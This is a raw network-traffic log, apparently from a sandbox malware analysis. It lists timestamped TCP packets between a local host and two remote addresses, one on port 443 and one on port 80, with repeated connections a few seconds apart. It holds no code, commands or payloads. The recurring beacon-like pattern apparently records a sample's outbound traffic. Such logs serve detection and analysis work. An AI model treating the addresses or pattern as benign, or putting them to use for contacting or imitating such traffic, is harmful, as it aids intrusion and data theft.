                                                                        Dec 12, 2024 21:39:32.691479921 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.691498041 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.691549063 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.691561937 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.691612959 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.691620111 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.691670895 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.691684008 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.691720963 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.691734076 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.691756964 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.691765070 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.691807032 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.691818953 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.691883087 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.691890001 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.691905975 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.691917896 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.691926956 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.739336014 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:34.599787951 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:34.599823952 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:34.599932909 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:34.599946976 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:34.603430033 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:34.603512049 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:34.638113022 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:34.957566977 CET4982480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:34.958389997 CET4983780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:35.077629089 CET8049824193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:35.077697039 CET4982480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:35.078166962 CET8049837193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:35.078270912 CET4983780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:35.078500032 CET4983780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:35.198548079 CET8049837193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:36.436031103 CET8049837193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:36.445741892 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:36.445828915 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:36.446059942 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:36.446635962 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:36.446671009 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:36.486655951 CET4983780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:37.820588112 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.822267056 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.822294950 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.822485924 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.822504044 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.822570086 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.822577000 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.822597027 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.822606087 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.822730064 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.822751045 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.822767019 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.822794914 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.822873116 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.822885036 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.822902918 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.822911978 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.822921038 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.822937012 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.822977066 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.822985888 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823005915 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823019028 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823019028 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823028088 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823039055 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823049068 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823082924 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823097944 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823123932 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823134899 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823163033 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823175907 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823187113 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823196888 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823235989 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823240995 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823246002 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823250055 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823266029 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823271990 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823308945 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823326111 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823369980 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823379993 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823395014 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823402882 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823410034 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823414087 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823440075 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823450089 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823488951 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823499918 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.823546886 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823586941 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823591948 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823611021 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823642015 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.823685884 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.867333889 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.869940996 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.869975090 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.870028973 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.870033979 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.870060921 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.870066881 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.870086908 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.870126009 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.870163918 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.870172977 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.870187998 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.870238066 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.911319971 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:37.911493063 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.911540985 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.911575079 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.911590099 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:37.955332994 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:39.430552959 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:39.430569887 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:39.430646896 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:39.430668116 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:39.430799961 CET44349840149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:39.430849075 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:39.431030989 CET49840443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:39.514719009 CET4983780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:39.515865088 CET4984980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:39.637006044 CET8049837193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:39.637041092 CET8049849193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:39.637140989 CET4983780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:39.637190104 CET4984980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:39.637399912 CET4984980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:39.757177114 CET8049849193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:40.934254885 CET8049849193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:40.945002079 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:40.945067883 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:40.945168018 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:40.945732117 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:40.945749044 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:40.986654043 CET4984980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:42.336319923 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338036060 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338076115 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338176012 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338202953 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338213921 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338227987 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338323116 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338349104 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338351011 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338375092 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338460922 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338495970 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338638067 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338660955 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338816881 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338829994 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338846922 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338867903 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338877916 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338890076 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338907957 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338926077 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338939905 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338958025 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338960886 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.338974953 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.338984966 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339009047 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339015961 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339020014 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339037895 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339044094 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339059114 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339072943 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339127064 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339137077 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339154005 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339173079 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339179039 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339190960 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339229107 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339243889 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339277029 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339286089 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339314938 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339330912 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339339018 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339345932 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339386940 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339394093 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339476109 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339483976 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339490891 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339498997 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339551926 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339572906 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339584112 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339596987 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339608908 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339616060 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339626074 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339633942 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339638948 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339643955 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339694977 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339715004 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339726925 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339735031 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339742899 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339752913 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339766026 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339783907 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339791059 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339799881 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339827061 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339849949 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339869022 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339880943 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339895964 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339904070 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339909077 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339912891 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.339951992 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.339965105 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:42.340001106 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:42.340007067 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:43.990895987 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:43.990919113 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:43.991003990 CET44349852149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:43.991054058 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:43.991054058 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:43.991499901 CET49852443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:44.065088987 CET4984980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:44.066169977 CET4986180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:44.185316086 CET8049849193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:44.185533047 CET4984980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:44.185992956 CET8049861193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:44.186191082 CET4986180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:44.186383009 CET4986180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:44.306227922 CET8049861193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:45.500380039 CET8049861193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:45.507776976 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:45.507826090 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:45.507936954 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:45.508424997 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:45.508439064 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:45.549149990 CET4986180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:46.879666090 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.881431103 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.881464958 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.881738901 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.881762028 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.881865025 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.881892920 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882019997 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882047892 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882159948 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882178068 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882194996 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882213116 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882265091 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882286072 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882308006 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882319927 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882330894 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882342100 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882348061 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882360935 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882632017 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882661104 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882703066 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882742882 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882759094 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882766008 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882807970 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882817030 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882864952 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882889986 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882924080 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882935047 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882960081 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882977962 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.882992983 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.882992983 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883003950 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883008003 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883027077 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883035898 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883053064 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883059978 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883073092 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883080006 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883101940 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883111000 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883117914 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883122921 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883136034 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883142948 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883158922 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883166075 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883182049 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883188963 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883203030 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883217096 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883253098 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883265018 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883282900 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883291006 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:46.883338928 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883358955 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883419037 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883435011 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883445978 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883465052 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883510113 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.883522987 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:46.927335978 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:48.516124964 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:48.516146898 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:48.516230106 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:48.516273022 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:48.516789913 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:48.516844988 CET44349864149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:48.516897917 CET49864443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:48.614830017 CET4986180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:48.616113901 CET4987380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:48.734806061 CET8049861193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:48.734862089 CET4986180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:48.735860109 CET8049873193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:48.735948086 CET4987380192.168.2.5193.122.6.168
